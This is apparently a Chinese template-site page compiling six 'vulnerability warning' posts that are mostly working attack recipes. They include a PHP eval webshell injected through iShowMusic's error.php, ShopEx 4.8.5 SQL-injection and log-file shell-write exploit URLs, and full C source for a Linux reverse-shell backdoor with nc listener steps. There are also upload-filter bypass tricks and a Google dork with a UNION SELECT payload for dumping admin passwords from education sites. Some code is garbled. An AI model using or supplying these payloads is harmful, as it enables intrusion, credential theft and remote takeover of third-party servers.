欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

iShowMusic V1.2 写入shell漏洞漏洞预警

时间:2022-11-03 09:13:17 其他范文 收藏本文 下载本文

以下是小编为大家准备的iShowMusic V1.2 写入shell漏洞漏洞预警,本文共6篇,仅供参考,大家一起来看看吧。

iShowMusic V1.2 写入shell漏洞漏洞预警

篇1:iShowMusic V1.2 写入shell漏洞漏洞预警

前几天公布的漏洞了,这几天比较忙,今天才看到,刚好前段时间用这套程序做了个音乐站,在自己的站里测试成功了,顺便也补了下漏洞。

--------

漏洞描述:

iShow Music 是一套基本于PHP+TXT的在线音乐播放程序。程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。在error.php 12-26行

PHP代码

elseif ($_POST['action']==“save”){$cknumon && GdConfirm($gdcode);if(emptyempty($id)) {Showmsg(“no”,“你还未选择歌曲呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}elseif(emptyempty($_POST['user'])) {Showmsg(“no”,“你还没写名字呢!”,“返回重新填写”,“javascript.:history.back(-1)”); exit;}else{$user=safeconvert($user);$line=“$user|$songname|$id|$errmsg|$timestamp|\n”;$e=“$datadir/error.php”;writetofile($e,$line,“a+”);Showmsg(“yes”,“提交成功,谢谢您的支持!”,“关闭本页”,“javascript.:window.close”);  exit;}

在global.php 27-34行

PHP代码

foreach($_POST as $_key=>$_value){$_POST[$_key]=str_replace(array('|','$','..'),array('|','$','..'),$_POST[$_key]);!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];}foreach($_GET as $_key=>$_value){$_GET[$_key]=str_replace(array('|','$','..'),array('|','$','..'),$_GET[$_key]);!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];}

这段代码是允许在register_globals在off的情况下工作程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.导致失去了这段代码本来的作用.

PHP代码

function writetofile($file_name, $data, $method = “w”){$filenum = fopen($file_name, $method);flock($filenum, LOCK_EX);$file_data = fwrite($filenum, $data);fclose($filenum);return $file_data;}

这个函数也没有任何过滤就把$data写进去了

<*参考By qiur3n

www.wolvez.org/*>

测试方法:

[www.sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

www.xxx.com/error.php?errid=1&errtitle=<?eval($_POST[wst]);?>然后提交一下你就能获得一个shell在www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文件夹改名,呵呵)

篇2:iShowMusic V1.2 写入shell漏洞

前几天公布的漏洞了,这几天比较忙,今天才看到,

iShowMusic V1.2 写入shell漏洞

刚好前段时间用这套程序做了个音乐站,在自己的站里测试成功了,顺便也补了下漏洞。

篇3:shopex 4.8.5.45144注入和远程shell写入漏洞漏洞预警

ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统,

一:shopex 4.8.5.45144 \core\include_v5\shopCore.php 注入漏洞

\core\include_v5\shopCore.php

01 public function shopCore( )

02 {

03               parent::kernel( );

04               if ( isset( $_POST['spgdif'] ) )

05               {

06                               $this->spgdif( );  //进入函数

07                               exit( );

08               }

09       ............................

10 }

11 public function spgdif( )

12 {

13               include_once( CORE_DIR.“/func_ext.php” );

14               if ( $_POST['session'] && $_POST['query'] && $_POST['sign'] )   //没任何过滤

15               {

16                               if ( md5( $_POST['query'].$_POST['session'].“shopex_stats” ) == $_POST['sign'] )  //MD5 验证,我们可以自己控制。

17                               {

18                                               $cert = $this->loadModel( “service/certificate” );

19                                               if ( $data = $cert->session_vaild( $_POST['session'] ) )

20                                               {

21                                                               $this->fetchdata( $_POST['query'] );

22                                               }

23                               ..........................

24 public function fetchdata( $params )

25 {

26               $params = unserialize( $params );

27               $sql = “SELECT ”;

28               foreach ( $params['fields'] as $key =>$value )

29               {

30                               $sql .= $value['method'].“(”.$value['name'].“)”;

31                               if ( $value['alias'] )

32                               {

33                                               $sql .= “ as ”.$value['alias']; //代入sql

34                               }

35                               $sql .= “,”;

36               }

37               $sql = substr( $sql, 0, -1 );

38               $sql .= “ FROM ”.$params['tbl'].“ ”;

39       ...............

40               $db = $this->database( );

41               ob_start( );

42               $data = $db->select( $sql );

43               ob_end_clean( );

44               if ( $data )

45               {

46                               echo json_encode( array(

47                                               “res” =>“succ”,

48                                               “data” =>$data  //没任何干扰,全部显示出来!(人品好了点,

49                               ) );

50               }

51               else

52               {

53                               echo json_encode( array(

54                                               “res” =>“fail”,

55                                               “data” =>$sql

56                               ) );

57               }

58 }

利用代码exp:

exploit.htm

-----

SQL Injection

Vulnerability

O(°…_°…)O…‰¡À' style=“width:150px;height:100px” />

shopex 4.8.5 SQL Injection Vulnerability 0day ”.06.12

By:qing

QQ:33089632

二:shopex 4.8.5.45144 \core\include_v5\crontab.php 远程shell写入漏洞

\core\include_v5\crontab.php (zend加密后的,我只发布解密后的代码)

01 public function run( )

02               {

03                               $this->logFile = HOME_DIR.“/logs/access.log.php”;

04                               $this->now = time( );

05                               $this->viewStat( );

06                               $messenger =& $this->loadModel( “system/messenger” );

07                               $messenger->runQueue( );

08               }

09

10               public function viewStat( )

11               {

12                               if ( !file_exists( $this->logFile ) )

13                               {

14                                               file_put_contents( $this->logFile, “#

15                               }

16                               if ( isset( $_GET['action'] ) )

17                               {

18                                               error_log( $this->now.”\t“.$_GET['action'].”\t“.$_GET['p'].”\n“, 3, $this->logFile );//没有任何过滤,

利用:

直接提交:127.0.0.1/shopex/?cron=1&action=1&p=1

一句话在:127.0.0.1/shopex/home/logs/access.log.php

篇4:linux 反弹shell漏洞预警

#include

#include

#include

#include

#include

#include

#include

void usage;

char shell[]=”/bin/sh“;

char message[]=”s8s8 welcome\n“;

int sock;

int main(int argc, char *argv[]) {

if(argc <3){

usage(argv[0]);

}

struct sockaddr_in server;

if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

printf(”Couldn't make socket!\n“); exit(-1);

}

server.sin_family = AF_INET;

server.sin_port = htons(atoi(argv[2]));

server.sin_addr.s_addr = inet_addr(argv[1]);

if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {

printf(”Could not connect to remote shell!\n“);

exit(-1);

}

send(sock, message, sizeof(message), 0);

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

execl(shell,”/bin/sh“,(char *)0);

close(sock);

return 1;

}

void usage(char *prog[]) {

printf(”\t\ts8s8 connect back door\n\n“);

printf(”\t sql@s8s8.net\n\n“);

printf(”Usage: %s

\n", prog);

exit(-1);

}

gcc -o f f.c

再在本机上监听一个端口

nc -l -p 8888

再执行./f 192.168.1.14 8888

注:反弹回来的 shell没提示符,

linux 反弹shell漏洞预警

篇5:常用的后台上传拿shell漏洞预警

有的时候进入后台了,拿shell也可能是你羁绊,有编辑器的话,再具体说吧,万一编辑器是精简版的或者是漏洞修补的FCK,只能利用一些小的上传点了,可不要小看这些上传点。

能不能利用的NC提交,其实NC提交已经反锁了,利用opera浏览器或者使用suitbute更为简洁。那一般说来什么情况下可以如此使用呢,看源代码

出现类似filepath value=”upload”就爽歪歪了,试着修改value=“upload.asp;”

出现类似filename value =”1312321321″  ,试着修改value=”1312321321.asp”

如果还不行的可是在后面加上一个空格或者;试试

篇6:教育站漏洞批量拿shell漏洞预警

教育站打印页面漏洞

google搜索 inurl:info_Print.asp?ArticleID=

默认后台:website/ad_login.asp

爆管理员密码:

union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

经过测试,大部分都可以爆出来,解下MD5就一路顺风~

马克斯CMScookies注入漏洞漏洞预警

Apple QuickTime信息泄露漏洞漏洞预警

在线支付逻辑漏洞总结漏洞预警

elasticsearch 漏洞利用工具套装漏洞预警

渗透底层路由技术漏洞预警

淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

一个CGI程序的漏洞挖掘漏洞预警

XPSHOP商城系统Cookies欺骗漏洞漏洞预警

Discuz!7.07.2后台settings.inc.php中写shell漏洞

Android Linux Kernel 2.6本地DoS漏洞预警

《iShowMusic V1.2 写入shell漏洞漏洞预警(共6篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档